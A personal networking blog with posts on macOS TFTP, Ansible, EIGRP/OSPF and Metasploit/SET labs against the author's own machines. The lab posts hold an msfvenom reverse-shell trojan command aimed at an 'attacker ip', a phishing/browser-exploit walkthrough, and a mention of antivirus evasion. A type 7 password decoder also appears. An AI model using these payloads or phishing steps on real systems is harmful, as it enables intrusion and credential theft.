Configure OS X as a TFTP server and download from a VRF-enabled 6800 chassis

Below are the steps I used to download files from a VRF-enabled Catalyst 6800 chassis to my Mac laptop:

1, Enable the TFTP server in OS X:

sudo launchctl load -F /System/Library/LaunchDaemons/tftp.plist
sudo launchctl start com.apple.tftpd

By default tftpd serves and writes files in /private/tftpboot, so uploads to the chassis are read from there and downloads land there. The directory (and any existing file the chassis is going to overwrite) has to be writable by the tftpd process:

sudo chmod 777 /private/tftpboot
sudo chmod 777 /private/tftpboot/*

TFTP has no authentication and no encryption, and this leaves a world-writable directory served to anyone who can reach the laptop, so copy the files out and unload the daemon (launchctl unload with the same plist) as soon as the transfer is done.

2, Set up the TFTP source interface on the 6800

I want to download and upload through the mgmt port, which belongs to the separate management VRF. For the TFTP traffic to be routed in that VRF, the chassis needs the following global configuration:

cat6k(config)#ip tftp source-interface mgmt0

3, Now the chassis can download from and upload to OS X over TFTP through the management VRF.

cat6k#copy running-config tftp://172.27.x.x

Address or name of remote host [172.27.x.x]?

Destination filename [xxx-confg]? running-config


85918 bytes copied in 1.084 secs (79260 bytes/sec)
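A running-config pulled this way crosses the network in cleartext and lands in a world-writable directory, so it is worth knowing what it contains before leaving it there. The following is an added example, not from the original post: a scanner for the usual credential lines in an IOS config, with a decoder for type 7 passwords (a fixed-key XOR, which is why they count as cleartext). The config text is constructed; the hostname, hash and passwords are placeholders.

```python
import re

# Cisco "type 7" passwords are a fixed-key XOR, not encryption, so any
# "password 7 ..." line in a config copied over TFTP is a cleartext credential.
TYPE7_KEY = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def decode_type7(encoded):
    """Reverse a type 7 string: two decimal digits give the key offset, the
    rest is hex, one byte per cleartext character."""
    seed = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return "".join(
        chr(b ^ ord(TYPE7_KEY[(seed + i) % len(TYPE7_KEY)])) for i, b in enumerate(data)
    )


# Lines a practitioner wants to know about before the file sits in /private/tftpboot.
# First match wins per line, so the specific patterns come before the generic one.
SECRET_PATTERNS = [
    ("type7-password", re.compile(r"\bpassword 7 (\S+)")),
    ("type7-key", re.compile(r"\bkey 7 (\S+)")),          # TACACS/RADIUS/ISAKMP keys
    ("enable-secret", re.compile(r"\benable secret (?:\d+ )?(\S+)")),
    ("snmp-community", re.compile(r"\bsnmp-server community (\S+)")),
    ("cleartext-password", re.compile(r"\bpassword (?:0 )?(\S+)$")),
]


def find_secrets(config_text):
    """Return one finding per line that carries a credential; type 7 values are decoded."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), 1):
        for kind, pattern in SECRET_PATTERNS:
            match = pattern.search(line)
            if not match:
                continue
            value = match.group(1)
            findings.append({
                "line": line_no,
                "kind": kind,
                "value": value,
                "cleartext": decode_type7(value) if kind.startswith("type7") else None,
            })
            break
    return findings


# Constructed running-config fragment (hostname, hash and passwords are placeholders).
SAMPLE_CONFIG = """\
hostname cat6k
enable secret 5 $1$abcd$placeholderhashvalue0000000
username admin password 7 070C285F4D06
snmp-server community public RO
line vty 0 4
 password 7 03105D1F16
 login
"""

if __name__ == "__main__":
    for f in find_secrets(SAMPLE_CONFIG):
        print(f"line {f['line']}: {f['kind']} {f['value']} -> {f['cleartext']}")
```

Run it over the file the chassis just wrote into /private/tftpboot; anything reported as type7 or snmp-community is readable by whoever else reaches that directory, and the cleartext-password pattern catches "password 0" and plain "password" lines on console and vty.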


Install Ansible on Mac OS

Ansible is mainly used to automate the provisioning and operation of Linux/Windows servers; however, from version 2.1 there are modules for network devices as well.

To test it I first installed Ansible on my Mac.

There are several ways to install Ansible, but the most common on a Mac are Homebrew and pip. Here is a comparison of the two:

"pip is a packager for the python world – you should only ever be able to install python-things with it; homebrew is a package manager targeted at OSX; it doesn't impose any restrictions onto what software you can install with it – since python is a subset of software.

installing things with brew will install them into /usr/local/;

installing things with pip will fetch packages from the Python Package Index, and it will install them in a place where your python interpreter will find them: either into your home directory (e.g. ~/.local/lib/python2.7/site-packages/) or in some global search-path of your python interpreter (e.g. /usr/local/lib/python2.7/dist-packages/)"

We will only look at installing Ansible with Homebrew:

1, Install the Xcode command line tools (C compiler), which Homebrew needs to build packages
xcode-select --install

2, Install python using homebrew

brew install python


brew install python3

Actually, steps 1 and 2 can be skipped, because every recent Mac OS X release already ships with Python 2.7.

3, brew install ansible

After the installation the Ansible binaries are under /usr/local/bin/:

mac-c02t6npagtfj:bin grayin$ ls ansible*
ansible            ansible-doc        ansible-pull
ansible-config     ansible-galaxy     ansible-vault
ansible-connection ansible-inventory
ansible-console    ansible-playbook

Note: run "brew update" before the installation to avoid unexpected errors.

How to influence EIGRP metrics to affect route selection

EIGRP updates carry five metric components: minimum bandwidth, delay, load, reliability, and maximum transmission unit (MTU). Of these five, by default (K1 = K3 = 1, K2 = K4 = K5 = 0) only minimum bandwidth and delay are used to compute the best path. Unlike the other components, minimum bandwidth is the lowest bandwidth anywhere along the path, so it does not reflect how many hops or how many low-bandwidth links the path contains. Delay is cumulative: it grows by the delay value of each segment in the path.

Therefore we can change the delay on an interface to affect route selection, but the change applies to every route learned through that interface (from any neighbor on it), so it only works when we want to influence all the routes learned via the EIGRP neighbor on that interface.

A more precise way is an offset-list: the metric of selected prefixes (matched by an access list) is increased by a fixed offset, either inbound on this router, which raises the reported distance (RD) received from the neighbor and therefore the feasible distance (FD) computed from it, or outbound on the neighbor router, which raises the RD advertised towards the peer. Because the offset is added per prefix rather than per interface, it can steer individual routes.
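To make this concrete, here is an added example (not from the original post) that computes the classic EIGRP composite metric with the default K values for two constructed paths, then repeats the selection after a delay change on the local interface and after an inbound offset-list. The topology, the neighbor names R2 and R3, and the bandwidth and delay figures are assumptions for illustration.

```python
# Classic EIGRP composite metric with the default K values (K1 = K3 = 1, K2 = K4 = K5 = 0):
#   metric = 256 * (10^7 / min_bandwidth_kbps + sum(delay_us) / 10)
# IOS performs both divisions as integer divisions, so this does too.


def composite_metric(min_bw_kbps, total_delay_us):
    return 256 * (10_000_000 // min_bw_kbps + total_delay_us // 10)


def path_metric(hops):
    """hops: list of (bandwidth_kbps, delay_us); hops[0] is this router's own outgoing
    interface, the rest are the interfaces along the neighbor's path to the destination."""
    return composite_metric(min(bw for bw, _ in hops), sum(delay for _, delay in hops))


def reported_distance(hops):
    """RD: the metric the neighbor advertises, i.e. the path without our local link."""
    return path_metric(hops[1:])


def set_local_delay(hops, delay_tens_us):
    """Model 'delay <n>' on the local interface (the command takes tens of microseconds)."""
    bw, _ = hops[0]
    return [(bw, delay_tens_us * 10)] + hops[1:]


def select_routes(paths, inbound_offsets=None):
    """paths: {neighbor: hops}. inbound_offsets: {neighbor: offset} models an
    'offset-list ... in' on the interface to that neighbor: the offset is added to the
    metric received, so both the RD kept for the neighbor and the FD computed from it
    grow. Returns (successor, feasible distance, feasible successors)."""
    inbound_offsets = inbound_offsets or {}
    table = {}
    for neighbor, hops in paths.items():
        offset = inbound_offsets.get(neighbor, 0)
        table[neighbor] = (path_metric(hops) + offset, reported_distance(hops) + offset)
    successor = min(table, key=lambda n: table[n][0])
    fd = table[successor][0]
    # Feasibility condition: a backup is loop-free only if its RD is below the FD.
    feasible = sorted(n for n, (_, rd) in table.items() if n != successor and rd < fd)
    return successor, fd, feasible


# Constructed topology: two neighbors, R2 and R3, both reaching the same destination.
PATHS = {
    "R2": [(1_000_000, 10), (1_000_000, 10), (1_000_000, 10)],  # three Gigabit hops
    "R3": [(100_000, 100), (1_000_000, 10)],                     # Fast Ethernet to R3, then Gigabit
}

if __name__ == "__main__":
    print(select_routes(PATHS))
    # 'delay 1000' on the interface towards R2 moves the successor to R3 for every
    # prefix learned on that interface.
    print(select_routes(dict(PATHS, R2=set_local_delay(PATHS["R2"], 1000))))
    # An inbound offset of 30000 on the R2 prefix does the same for that prefix only,
    # but R2 is no longer a feasible successor: its RD now exceeds the new FD.
    print(select_routes(PATHS, {"R2": 30000}))
```

The third run shows the side effect to check in show ip eigrp topology after adding an offset-list: with the offset the R2 path still exists, but its RD (33072) is above the new FD (28416), so it drops out of the feasible successor list and a failure of R3 means a query instead of an instant switchover.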

OSPF loadbalance

By default OSPF installs at most 4 routes in the routing table when more than 4 equal-cost routes exist for the same subnet. OSPF can install up to 16 equal-cost routes and load-balance across them; to configure this, use the router ospf subcommand maximum-paths, e.g. maximum-paths 16.

OSPF uses link cost as its metric, not hop count. The cost of an interface is the reference bandwidth (100 Mbps by default) divided by the interface bandwidth, truncated to an integer, which gives these defaults:

Network type          Cost
FDDI / Fast Ethernet  1
Token Ring (16 Mbps)  6
Ethernet              10
E1                    48
T1                    64
64 kb/s               1562
56 kb/s               1785
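Added example (not from the original post): the cost formula behind the table, plus the maximum-paths cap, in Python. The reference bandwidth and the link speeds are the IOS defaults; the next-hop names are made up.

```python
# OSPF interface cost on IOS: reference bandwidth / interface bandwidth, integer
# truncated and clamped to 1..65535. The default reference bandwidth is 100 Mbps.
DEFAULT_REF_BW_MBPS = 100


def ospf_cost(bw_kbps, ref_bw_mbps=DEFAULT_REF_BW_MBPS):
    cost = (ref_bw_mbps * 1000) // bw_kbps
    return max(1, min(cost, 65535))


def installed_paths(candidates, max_paths=4):
    """candidates: {next_hop: total path cost}. OSPF installs only the lowest-cost
    next hops, and at most max_paths of them ('maximum-paths', default 4)."""
    best = min(candidates.values())
    equal = sorted(hop for hop, cost in candidates.items() if cost == best)
    return equal[:max_paths]


# Link speeds in kbps for the link types in the table (constructed list).
LINKS = {
    "FDDI / Fast Ethernet": 100_000,
    "Token Ring (16 Mbps)": 16_000,
    "Ethernet": 10_000,
    "E1": 2_048,
    "T1": 1_544,
    "64 kb/s": 64,
    "56 kb/s": 56,
}


def cost_table(ref_bw_mbps=DEFAULT_REF_BW_MBPS, links=LINKS):
    return {name: ospf_cost(bw, ref_bw_mbps) for name, bw in links.items()}


if __name__ == "__main__":
    print(cost_table())
    # The caveat: with the 100 Mbps default every link of 100 Mbps or more costs 1, so
    # OSPF cannot tell Fast Ethernet, Gigabit and 10 Gigabit apart until the reference
    # bandwidth is raised (auto-cost reference-bandwidth 10000), and it has to be raised
    # on every router in the area or the costs stop being comparable.
    for bw in (100_000, 1_000_000, 10_000_000):
        print(bw, ospf_cost(bw), ospf_cost(bw, 10_000))
    hops = {f"nh{i}": 20 for i in range(1, 7)}  # six equal-cost next hops
    print(installed_paths(hops), installed_paths(hops, 16))
```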

EIGRP likewise defaults to 4 paths for load balancing, and the maximum that can be set with maximum-paths is 16.

When multiple routes are installed in the routing table, a Cisco switch relies on CEF to pick the next hop for each packet. By default CEF hashes the source/destination IP pair, so all packets of a flow take the same path. If every router along the way computes the same hash, a downstream router only ever receives the flows that hashed one particular way upstream, so some of its equal-cost links never carry traffic; this is CEF polarization. The universal load-sharing algorithm (ip cef load-sharing algorithm universal) avoids it by mixing a per-router ID into the hash.
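Added example, not from the original post, that simulates the polarization just described: two tiers of routers each split a constructed set of 200 flows across two equal-cost links by hashing the src/dst pair. The router names, the per-router IDs and the addresses are assumptions, and SHA-256 stands in for the platform's hash; the effect only depends on every router using the same function.

```python
import hashlib


def pick_link(src, dst, n_links, router_id=0):
    """Per-flow choice among n equal-cost links: hash the src/dst pair, as CEF does,
    and mix in a per-router value. router_id=0 on every router models the old
    behaviour where all routers compute exactly the same hash."""
    digest = hashlib.sha256(f"{router_id}|{src}|{dst}".encode()).digest()
    return int.from_bytes(digest[:4], "big") % n_links


def simulate(flows, universal):
    """Two-tier topology: R1 has two equal-cost uplinks, one to R2a and one to R2b,
    and each of those has two equal-cost uplinks of its own. Returns how many flows
    each (router, link) pair carried. universal=False: identical hash everywhere."""
    tier2 = ("R2a", "R2b")
    ids = {"R1": 11, "R2a": 22, "R2b": 33} if universal else {"R1": 0, "R2a": 0, "R2b": 0}
    counts = {(router, link): 0 for router in tier2 for link in (0, 1)}
    for src, dst in flows:
        router = tier2[pick_link(src, dst, 2, ids["R1"])]
        link = pick_link(src, dst, 2, ids[router])
        counts[(router, link)] += 1
    return counts


# Constructed flow set: 20 sources talking to 10 destinations, 200 src/dst pairs.
FLOWS = [(f"10.0.0.{s}", f"10.1.0.{d}") for s in range(1, 21) for d in range(1, 11)]

if __name__ == "__main__":
    # Polarized: every flow R2a receives hashed to 0 at R1, so R2a hashes it to 0 again
    # and its link 1 stays idle; R2b likewise only ever uses its link 1.
    print("polarized:", simulate(FLOWS, universal=False))
    print("universal:", simulate(FLOWS, universal=True))
```

With identical hashing the second tier gets exactly one usable link per router no matter how many flows there are; the per-router ID breaks the correlation and both links at each second-tier router carry traffic.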


Metasploit & Armitage

Armitage is a GUI front end for Metasploit; it saves you from remembering all the msfconsole commands and visualizes scan results. Both tools ship with Kali Linux, and because Armitage drives the same Metasploit framework underneath, knowing one carries over to the other.

I tried both; below is the guide to discovering all online machines in a subnet with Armitage:

1, Hosts tab -> Clear Database

This prepares a clean environment for a new discovery.

2, Hosts -> Nmap Scan -> Quick Scan (OS detect) -> enter the subnet to scan

This takes a couple of minutes to complete depending on the size of the subnet. The same scan can be run directly with nmap on the CLI.

After this step you should see the operating system running on each machine; however, it could not recognize Windows 10. Looking at how nmap detects the OS explains why: nmap probes a set of ports on the target and needs to find some of them answering (ideally one open and one closed TCP port) to fingerprint the stack, and on Windows hosts 139 and 445 are typically the open ones. If those ports are open, nmap can very likely use them to identify the OS of the target; more details here.

"One of Nmap's best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to its nmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6."

When scanning a Windows 10 machine we instead get a message like "all ports are filtered": the host firewall drops the probes, so there is nothing for the fingerprinting to work with. Below is an example of scanning a Windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds
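Added example (not part of the original post): a small parser for nmap -O normal output that tells an identified host apart from the "all ports filtered" / "too many fingerprints" case shown above. The two scan reports are constructed in nmap's output format, using documentation addresses and a reserved MAC rather than the hosts from the run above.

```python
import re

# Two constructed nmap -O reports: one for a host whose firewall drops everything
# (the Windows 10 case) and one for a host with open ports. Addresses are from the
# documentation range and the MAC is a reserved example value.
SCAN_FILTERED = """\
Starting Nmap 7.40 ( https://nmap.org ) at 2017-10-05 04:58 EDT
Nmap scan report for host.lan (192.0.2.10)
Host is up (0.014s latency).
All 1000 scanned ports on host.lan (192.0.2.10) are filtered
MAC Address: 00:00:5E:00:53:01 (Example vendor)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
"""

SCAN_LINUX = """\
Nmap scan report for 192.0.2.20
Host is up (0.0010s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
Device type: general purpose
Running: Linux 4.X
OS details: Linux 4.4
Network Distance: 1 hop
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")


def parse_os_scan(report):
    """Pull out the fields that matter for judging an OS-detection result."""
    result = {
        "host": None,
        "open_ports": [],
        "all_filtered": False,
        "too_many_matches": False,
        "os_details": None,
        "distance": None,
    }
    for line in report.splitlines():
        if line.startswith("Nmap scan report for "):
            result["host"] = line[len("Nmap scan report for "):]
        elif line.startswith("All ") and line.endswith("are filtered"):
            result["all_filtered"] = True
        elif line.startswith("Too many fingerprints match"):
            result["too_many_matches"] = True
        elif line.startswith("OS details: "):
            result["os_details"] = line[len("OS details: "):]
        elif line.startswith("Network Distance: "):
            result["distance"] = int(line.split()[2])
        else:
            m = PORT_LINE.match(line)
            if m:
                result["open_ports"].append((int(m.group(1)), m.group(2), m.group(3)))
    return result


def assess(result):
    """Why the scan did or did not identify the OS."""
    if result["all_filtered"]:
        return "filtered"    # nothing answered; a host firewall is dropping the probes
    if result["os_details"]:
        return "identified"
    if result["too_many_matches"]:
        return "ambiguous"   # responses seen, but the fingerprint is not specific enough
    return "unknown"


if __name__ == "__main__":
    for report in (SCAN_FILTERED, SCAN_LINUX):
        parsed = parse_os_scan(report)
        print(parsed["host"], parsed["open_ports"], assess(parsed))
```

A "filtered" verdict means more probes of the same kind will not help; the fingerprint needs a port that answers, so the next step is a different vantage point (inside the host firewall's allowed profile) or a different technique, not a rerun.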

3, When the scan completes, all online machines are shown as icons in the workspace. Attacks -> Find Attacks lists the possible exploits for each machine, and Attacks -> Hail Mary launches all of them at once against the target machines.

Unfortunately, when I tried Hail Mary against my Windows 7 and Windows 8.1 machines, none were compromised. Again, it looks like all those attacks in Metasploit are already well known and cannot be a serious threat in the real world.

To get a successful attack we can also use a Metasploit payload. I tested the classic payload windows/meterpreter/reverse_tcp.

Here is the guide on generating a malicious .exe; in short:

# msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST="attacker ip" LPORT=4444 -o /root/Desktop/trojan.exe

msfvenom generates the payload binaries for Metasploit. The executable has to be transferred to the target machine and run there; it then connects back to the attacker's listener at LHOST:LPORT and gives the attacker a Meterpreter session, i.e. a backdoor.

The real challenge is actually getting this .exe onto the victim machine. I am using my own machine for the test but could not even load the file onto it. I tried sending it to myself by email, but the attachment was blocked because Google detected malware in it. I tried copying the file to a USB stick, but as soon as I plugged the stick into my test machine the malware was removed by Windows Defender. The author recommended using an encoder, for example Veil-Evasion, to disguise the .exe file; I need to find time to try this.




Social Engineering Toolkit

I tried these tools under Kali Linux; below are some notes:


Kali Linux image: Kali Linux 64-bit VMware VM, can be downloaded here

VMware Fusion: 8.5.8

Social Engineering Toolkit

To start up, type:

root@kali:/# setoolkit

The main menu is displayed as below:

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

I tried 1, which goes to this submenu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

There is a lot of material about SET online; I only did a very basic lab for item 2, and tried item 1 as well but without success.

item 1 -> Perform a Mass Email Attack -> 15) Custom EXE to VBA (sent via RAR) (RAR required) -> 2) Windows Meterpreter Reverse_TCP

After entering LHOST and PORT, I got the following error:

IP address for the payload listener (LHOST):
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443…
[*] All good! The directories were created.
[-] Generating fileformat exploit…

[!] Something went wrong, printing the error: name ‘a’ is not defined

item 2) Website Attack Vectors ->

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu


The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: n
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack> Select a template:1

Enter the browser exploit you would like to use [8]:

1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9) Java Applet JMX Remote Code Execution (2013-01-10)
10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12) Java 7 Applet Remote Code Execution (2012-08-26)
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18) Adobe Flash Player Object Type Confusion (2012-05-04)
19) Adobe Flash Player MP4 “cprt” Overflow (2012-02-15)
20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23) Adobe Flash Player SWF Memory Corruption Vulnerability (2011-04-11)
24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
25) Internet Explorer CSS Import Use After Free (2010-11-29)
26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33) Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow (2010-09-07)
34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35) Microsoft Help Center XSS and Command Execution (2010-06-09)
36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37) Microsoft Internet Explorer “Aurora” Memory Corruption (2010-01-14)
38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46) Metasploit Browser Autopwn (USE AT OWN RISK!)


1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and

After these choices, SET starts a web server on the Kali machine (port 8080 by default). What is left is to convince a victim to visit this website. As soon as the link was clicked, I could see a mass of Java applets being pushed to the victim's machine and trying to open a session back to the Kali machine. This is the basic example of an attack that lures the victim into clicking a malicious link.

Once the attack is successful, in theory I will see active sessions in Kali by typing "sessions".

Windows Reverse_TCP Meterpreter is a well-known way to build a backdoor session with the victim machine. This is the option that has been regarded as the most likely to succeed. Unfortunately, however, this is no longer the case. It might be a useful attack against Windows XP with no firewall or Defender active. When I tried it against a victim running Windows 8.1 with an updated Windows Defender, Defender popped up and removed the malware immediately, and I got no active session to the victim from my Kali machine. Especially when I use Chrome or Firefox, I can feel that the attempt is blocked even by the browsers.

SET is a great tool for learning attack concepts and ideas, but it is very likely that none of the modules and tools in SET are useful for attacking in the real business world, where servers, firewalls, IDS and other systems are fully patched and well protected.